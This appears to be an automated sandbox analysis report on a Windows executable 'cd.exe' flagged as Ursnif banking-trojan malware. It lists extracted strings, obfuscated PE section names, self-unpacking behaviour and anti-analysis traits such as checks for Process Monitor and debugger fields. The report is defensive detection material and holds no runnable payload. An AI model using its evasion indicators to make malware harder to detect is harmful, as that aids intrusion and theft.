Source: cd.exe	Binary string: O 3Eg_interceptionsNtMapViewOfSectionNtUnmapViewOfSectiong_originals\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Invalid Object foundD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_policy.ccrequested path: actual path: Unexpected handle for path: Unexpected handle\/?/?\?:?:\\/?/?\UNC\Failed to process path (recursion detected): error code:Failed to process path:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\\?\pipe\\Device\NamedPipe\SameObject check failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_policy.ccntdll.dllkernel32.dllNtAllocateVirtualMemoryNtCloseNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtSetInformationFileNtDeleteValueKeyNtCreateMutantNtOpenMutantNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenEx\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSuspendProcessNtResumeProcessNtCreateProcessExntdll.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeCreateProcessWAction: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_policy.ccapp name: command line: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ for: Unexpected D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_policy.ccReal path: CreateKeyOpenKey\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Handle AccessCheck failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_policy.cc\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtQuerySymbolicLinkObjectNtOpenSymbolicLinkObject%d\Sessions\BNOLINKSNtCreateEventNtOpenEvent\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser\|rdr\|\Javascripts\JSByteCodeWin.bin\|rdr\|\AdobeUpdater.dll\|sys\|\ddraw.dll\|sys\|\dciman32.dllAdobeReaderSpeedLaunchCmdWndSOFTWARE\Adobe\Acrobat Reader\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@4/27@6/5

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: cd.exe	String found in binary or memory: /cite/word/install
Source: cd.exe	String found in binary or memory: Couldn't find documents: You have selected documents from both My Library a Shared Group, or from multiple Shared Groups, which is not supported.Documents in multiple groupsPlease select the documents you wish to cite.importing %1 documents from plugin into ??geometry/newLibrarySplittergeometry/horizontalSplittergeometry/verticalSplitterSynchronizing - Step %1 of %2GroupFilterCollectionDeletedFilter1trigger()Synchronizing Zotero - Step %1 of %22duplicateSearchStarted(WorkerJob::Pointer)1highlightAndScrollTo(QList<Document::Pointer>)2allJobsFinished(QList<Document::Pointer>)Invite/invite/?dgcid=Mendeley_Desktop_Invite-colleagues/cite/word/install/importshowSignInmendeley://loginshowJoinMendeleyFormmendeley://registerDelete this document from your library?Delete %1 documents from your library?
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
Source: cd.exe	String found in binary or memory: 1openHelpGuides()Help Guides1openMendeleyWebsite()Mendeley Website1openFAQ()FAQ1openContactSupport()Contact SupportCheck for UpdatesCheck Now1toggleCheckForPreviewUpdates()Create Backup...1openMendeleyPrivacyPolicy()Privacy Policy1openMendeleyTandCs()Terms and Conditions1showAbout()https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-websitehttps://www.elsevier.com/legal/elsevier-website-terms-and-conditionshttps://www.elsevier.com/legal/privacy-policyhttps://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQhttps://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contact-SupportOpt-out of Experimental ReleasesOpt-in to Experimental Releases
Source: cd.exe	String found in binary or memory: recently-added
Source: cd.exe	String found in binary or memory: 1timeout()1showDocumentView()all-documentsrecently-addedmy-publicationsfavoritesfavouritesunsortedselectExistingGroupByIdactiongroupIdtabNameoverviewmembersInvalid group tab namefailed to select group1syncProgressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)2progressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)1updateRecentlyRead()selectExistingDocumentByIdidfileToOpenselectExistingFolderByIdfolderIdcan't fetch unknown document No document found matching the id1showStyleError(StylesFetcher::DownloadFromUrlError,QString)1selectStyle(QString)Style selected - %1Cannot install - %1. Error: %2No folder found matching the remote idMainWindowController::selectFilterByName: Can't find the filter showDocumentViewsetDocumentPropertiesPaneVisibilityselectMetadataTabselectTagsAndNotesTabselectFilterBySlugselectFilterByNameselectDocumentRowselectMainTabselectDocumentByIdselectGroupByIdH
Source: cd.exe	String found in binary or memory: :/images/onboarding/bubbles/add_copy.png
Source: cd.exe	String found in binary or memory: Try Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one click
Source: cd.exe	String found in binary or memory: <html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>®</sup> or LibreOffice<sup>™</sup></p></body></html>
Source: cd.exe	String found in binary or memory: <html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>
Source: cd.exe	String found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>®</sup> or LibreOffice<sup>™</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be hereUserGuidePopover_Page%1unverifiedH
Source: cd.exe	String found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>®</sup> or LibreOffice<sup>™</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be hereUserGuidePopover_Page%1unverifiedH
Source: cd.exe	String found in binary or memory: Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.
Source: cd.exe	String found in binary or memory: 1updateWordPlugin()1uninstallWordPlugin()Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.The Mendeley plugin requires Microsoft Word %1 or later.
Source: cd.exe	String found in binary or memory: documents-add
Source: cd.exe	String found in binary or memory: folder-add
Source: cd.exe	String found in binary or memory: 333?editMenuSeparatorviewerActions.selectionMenuviewerActions.highlightMenuviewerActions.zoomModeMenudocuments-addAddnewDocumentActionImport additional documents to the current collectionaddFilesActionaddFolderActionWatch FolderwatchFolderActionAdd Entry ManuallyaddManualEntryActionemptyEmptyemptyTrashActionDelete all documents from the Trashdocument-deleteremoveDocumentActionMove the selected documents to the TrashremoveDocumentActionTrashContextDelete the selected documents from the TrashrestoreRestoreRestore DocumentsrestoreDocumentActionRestore the selected documents to their original locationRemove from FolderremoveFromFolderActionRemove the selected documents from this folderRename Document Files...renameDocumentActionfolder-addCreate FolderNew Folder...newFolderActionCreate a new folderNew GroupNew Group...newGroupActionCreate a new groupfolder-removeRemove CollectionRemoveCollectionActionRemove the current collectioneditSettingsActionRename Collection...renameFolderActionmagnifiercatalogSearchActionMendeley Catalog Searchrelated-documentsRelatedrecommendActionRecommend related documentsSyncSynchronize LibrarysynchronizeActionSynchronize your library with Mendeley WebHelpHelp ContentshelpActionOpen the Online Help Guide for MendeleyFindfindActionFind NextfindNextActionFind PreviousfindPreviousActionselectAllActionciteCitesendCitationActionSend citation to plugincancelcancelCitationActionCancel sending citation to pluginEdit...editDocumentActionactionNotDuplicatesUpdate DetailslookupMetadataActionfullscreenFullscreenfullScreenActionzoomActionzoom-inZoom InzoomInActionzoom-outZoom OutzoomOutActionrotate-leftRotate LeftrotateAnticlockwiseActionrotate-rightRotate RightrotateClockwiseActionpanPanpanActionfit-pageFit to PagezoomModeFitPageActionfit-widthFit to WidthzoomModeFitWidthActionzoomModeCustomselectActionselect-rectangleSelect RectangleselectRectangleActionselect-textSelectSelect TextselectFlowActionColorSelect ColorselectColorActionhighlightActionhighlight-textHighlightHighlight TexthighlightTextActionhighlight-rectHighlight RectanglehighlightRectangleActionnoteNoteAdd NoteaddNoteActioncopyActionpasteAction:/icons/64x64/actions/%1/%2.png:/icons/toolbar/%1/%2.png:/icons/toolbar/%1/%2-active.png:/icons/16x16/actions/%1.png
Source: cd.exe	String found in binary or memory: The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.
Source: cd.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: cd.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: cd.exe	String found in binary or memory: Commands : /install - Installs Steam Client Service
Source: cd.exe	String found in binary or memory: /installscript <file> <appid> - Runs a Steam game install script
Source: cd.exe	String found in binary or memory: /installscript
Source: cd.exe	String found in binary or memory: /installscript failed on: %s: %d
Source: cd.exe	String found in binary or memory: /install
Source: cd.exe	String found in binary or memory: /install service install failed
Source: cd.exe	String found in binary or memory: /setupsteam <command line> - Runs SteamSetup.exe/hide/installscript/installscript failed on: %s: %d
Source: cd.exe	String found in binary or memory: /install/install service install failed
Source: cd.exe	String found in binary or memory: /Install
Source: cd.exe	String found in binary or memory: /Stop
Source: cd.exe	String found in binary or memory: /Stop
Source: cd.exe	String found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
Source: cd.exe	String found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
Source: cd.exe	String found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
Source: cd.exe	String found in binary or memory: ,ZJAll AccessRead/WriteExecuteQuery ValueSet ValueCreate Sub KeyEnumerate Sub KeysNotifyCreate LinkWOW64_ResWOW64_32KeyWOW64_64KeyGeneric Read/Write/ExecuteGeneric Read/WriteGeneric Read/ExecuteGeneric Write/ExecuteGeneric ReadGeneric WriteGeneric ExecuteRead Data/List DirectoryWrite Data/Add FileAppend Data/Add Subdirectory/Create Pipe InstanceRead EAWrite EAExecute/TraverseDelete ChildRead AttributesWrite AttributesRead ControlWrite DACWrite OwnerSynchronizeAccess System SecurityMaximum Allowedkernel32.dllSD\fltlib.dll%llx%lf%s%07d%02u:%02u:%02u.%07u%02u:%02u:%02u%I64d0x%I64x-1%I64u KB MB GBWindows 2000Windows XPWindows XP x64Windows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016Windows %d.%d (build %d.%d)%08x:%08x%02X64-bit32-bit%x:%x:%x:%x:%x:%x:%x:%x%d.%d.%d.%d:%d:None
Source: cd.exe	String found in binary or memory: -help
Source: cd.exe	String found in binary or memory: sun/launcher/LauncherHelper
Source: cd.exe	String found in binary or memory: Error: Corrupt jvm.cfg file; cycle in alias list.ERRORError: Unable to resolve VM alias %sWarning: %s VM not supported; %s VM will be usedError: %s VM not supported-version-fullversion-help-?-jar-X-XX:NativeMemoryTracking=%s%d=%s%s%dTRACER_MARKER: NativeMemoryTracking: env var is %s
Source: cd.exe	String found in binary or memory: sun/launcher/LauncherHelper(Z[B)Ljava/lang/String;makePlatformStringjava/lang/String(ZILjava/lang/String;)Ljava/lang/Class;checkAndLoadMain%ld micro seconds to load main class
Source: cd.exe	String found in binary or memory: browser-startup-dialog
Source: cd.exe	String found in binary or memory: enable-service-binary-launcher
Source: cd.exe	String found in binary or memory: gpu-launcher
Source: cd.exe	String found in binary or memory: gpu-sandbox-start-early
Source: cd.exe	String found in binary or memory: gpu-startup-dialog
Source: cd.exe	String found in binary or memory: ppapi-plugin-launcher
Source: cd.exe	String found in binary or memory: ppapi-startup-dialog
Source: cd.exe	String found in binary or memory: renderer-startup-dialog
Source: cd.exe	String found in binary or memory: utility-startup-dialog
Source: cd.exe	String found in binary or memory: gpu2-startup-dialog
Source: cd.exe	String found in binary or memory: --start-crash-handler
Source: cd.exe	String found in binary or memory: QVersionNumbera+CONOUT$--start-crash-handlerRadareOrgCutterQList

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: cd.exe

Static file information: File size 3922432 > 1048576

Source: cd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
Source:	Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
Source:	Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
Source:	Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
Source:	Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\cd.exe

Unpacked PE file: 1.2.cd.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\cd.exe

Unpacked PE file: 1.2.cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;aZAqrnJo:R;BGOllIzc:R;yQtoRARz:R;dZLJZOuu:R;sdDGHbsk:R;cQfsAIeK:R;nJjdtQIB:R;pcHOcQzM:R;wDcvvqlu:R;orXBiygL:R;AiZKCfrK:R;myoGvTPf:R;AVTlzkED:R;bzLENpIH:R;XcYnViEt:R;mbKhPZXg:R;lUpFJlcq:R;yiDSdvAK:R;tWLpgAgw:R;bTGdVUjl:R;ziIDaoXi:R;LzawvTwX:R;LnIDzdzd:R;wkCXpCGo:R;nqpeKqho:R;MRjgEOqy:R;JcLmCXgA:R;OtycdIdu:R;IbVOTdPC:R;FgFHDyjf:R;ybeqBvHg:R;IbzUQYJs:R;AQBgSYnS:R;XxFUmGWX:R;afVQQtfj:R;nwvMTysA:R;ZHPQhgLD:R;pxMMJkwk:R;JXHCNYcJ:R;lYRopDTG:R;bcYTpMaT:R;nuBezWiu:R;yPvpmSBg:R;OoEfGgTM:R;kYRGCWEC:R;ssiFbfZW:R;KHKSQqok:R;NcZcjaDP:R;mIUEylgT:R;lluFjCpP:R;BHqNuAAF:R;dWFkhiaJ:R;NeKPPFmp:R;mRaJxCpw:R;sjZRApAc:R;mJuapRBt:R;AUQwTDRB:R;Mzpcxreq:R;DQLewjlc:R;yQzDovRx:R;KsasGyWE:R;qALhWEsZ:R;EhLKChYp:R;juiuAwmE:R;FPCcnPuO:R;DQPOFovS:R;eeLebknr:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\cd.exe

Code function: 1_2_0040322B push ecx; ret

Source: cd.exe	Static PE information: section name: aZAqrnJo
Source: cd.exe	Static PE information: section name: BGOllIzc
Source: cd.exe	Static PE information: section name: yQtoRARz
Source: cd.exe	Static PE information: section name: dZLJZOuu
Source: cd.exe	Static PE information: section name: sdDGHbsk
Source: cd.exe	Static PE information: section name: cQfsAIeK
Source: cd.exe	Static PE information: section name: nJjdtQIB
Source: cd.exe	Static PE information: section name: pcHOcQzM
Source: cd.exe	Static PE information: section name: wDcvvqlu
Source: cd.exe	Static PE information: section name: orXBiygL
Source: cd.exe	Static PE information: section name: AiZKCfrK
Source: cd.exe	Static PE information: section name: myoGvTPf
Source: cd.exe	Static PE information: section name: AVTlzkED
Source: cd.exe	Static PE information: section name: bzLENpIH
Source: cd.exe	Static PE information: section name: XcYnViEt
Source: cd.exe	Static PE information: section name: mbKhPZXg
Source: cd.exe	Static PE information: section name: lUpFJlcq
Source: cd.exe	Static PE information: section name: yiDSdvAK
Source: cd.exe	Static PE information: section name: tWLpgAgw
Source: cd.exe	Static PE information: section name: bTGdVUjl
Source: cd.exe	Static PE information: section name: ziIDaoXi
Source: cd.exe	Static PE information: section name: LzawvTwX
Source: cd.exe	Static PE information: section name: LnIDzdzd
Source: cd.exe	Static PE information: section name: wkCXpCGo
Source: cd.exe	Static PE information: section name: nqpeKqho
Source: cd.exe	Static PE information: section name: MRjgEOqy
Source: cd.exe	Static PE information: section name: JcLmCXgA
Source: cd.exe	Static PE information: section name: OtycdIdu
Source: cd.exe	Static PE information: section name: IbVOTdPC
Source: cd.exe	Static PE information: section name: FgFHDyjf
Source: cd.exe	Static PE information: section name: ybeqBvHg
Source: cd.exe	Static PE information: section name: IbzUQYJs
Source: cd.exe	Static PE information: section name: AQBgSYnS
Source: cd.exe	Static PE information: section name: XxFUmGWX
Source: cd.exe	Static PE information: section name: afVQQtfj
Source: cd.exe	Static PE information: section name: nwvMTysA
Source: cd.exe	Static PE information: section name: ZHPQhgLD
Source: cd.exe	Static PE information: section name: pxMMJkwk
Source: cd.exe	Static PE information: section name: JXHCNYcJ
Source: cd.exe	Static PE information: section name: lYRopDTG
Source: cd.exe	Static PE information: section name: bcYTpMaT
Source: cd.exe	Static PE information: section name: nuBezWiu
Source: cd.exe	Static PE information: section name: yPvpmSBg
Source: cd.exe	Static PE information: section name: OoEfGgTM
Source: cd.exe	Static PE information: section name: kYRGCWEC
Source: cd.exe	Static PE information: section name: ssiFbfZW
Source: cd.exe	Static PE information: section name: KHKSQqok
Source: cd.exe	Static PE information: section name: NcZcjaDP
Source: cd.exe	Static PE information: section name: mIUEylgT
Source: cd.exe	Static PE information: section name: lluFjCpP
Source: cd.exe	Static PE information: section name: BHqNuAAF
Source: cd.exe	Static PE information: section name: dWFkhiaJ
Source: cd.exe	Static PE information: section name: NeKPPFmp
Source: cd.exe	Static PE information: section name: mRaJxCpw
Source: cd.exe	Static PE information: section name: sjZRApAc
Source: cd.exe	Static PE information: section name: mJuapRBt
Source: cd.exe	Static PE information: section name: AUQwTDRB
Source: cd.exe	Static PE information: section name: Mzpcxreq
Source: cd.exe	Static PE information: section name: DQLewjlc
Source: cd.exe	Static PE information: section name: yQzDovRx
Source: cd.exe	Static PE information: section name: KsasGyWE
Source: cd.exe	Static PE information: section name: qALhWEsZ
Source: cd.exe	Static PE information: section name: EhLKChYp
Source: cd.exe	Static PE information: section name: juiuAwmE
Source: cd.exe	Static PE information: section name: FPCcnPuO
Source: cd.exe	Static PE information: section name: DQPOFovS
Source: cd.exe	Static PE information: section name: eeLebknr

Source: initial sample

Static PE information: section name: .text entropy: 6.93749374769

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

Source: C:\Users\user\Desktop\cd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\cd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: cd.exe

Binary or memory string: IIRP_MJ_FASTIO_PROCMON.EXEPROCEXP.EXEAUTORUNS.EXESYSTEMPAGEFILE.SYS$MFT$MFTMIRR$LOGFILE$VOLUME$ATTRDEF$ROOT$BITMAP$BOOT$BADCLUS$SECURE$UPCASE$EXTENDFAST IOINCLUDEEXCLUDE<BAD>OKAY TO OVERWRITE EVENT LOG ''?AN ERROR OCCURRED OPENING THE SNAPSHOT ''APPLYING EVENT FILTEROPERATION CANCELLED: THE LISTVIEW DATA MAY BE INCOMPLETEPROCESS MONITOR CAN OPEN AT MOST BACKING FILES<PAGEFILE>YESNOEVENTPROCESSINDEXSTACKFRAMEDEPTHADDRESS + PATHLOCATIONPROCESSPROCESSIDPARENTPROCESSIDPARENTPROCESSINDEXAUTHENTICATIONIDCREATETIMEFINISHTIMEISVIRTUALIZEDIS64BITINTEGRITYOWNERPROCESSNAMECOMMANDLINECOMPANYNAMEVERSIONDESCRIPTIONMODULELISTMODULETIMESTAMPBASEADDRESSSIZECOMPANYPROCESS MONITOR - EXPORTING EVENT DATAWT, CCS=UTF-8"%S"

Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004359CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_0043559C push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_008004F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_008000C6 push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\cd.exe

Code function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,

Source: C:\Users\user\Desktop\cd.exe

Code function: 1_2_00402F32 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,

Source: cd.exe	Binary or memory string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe 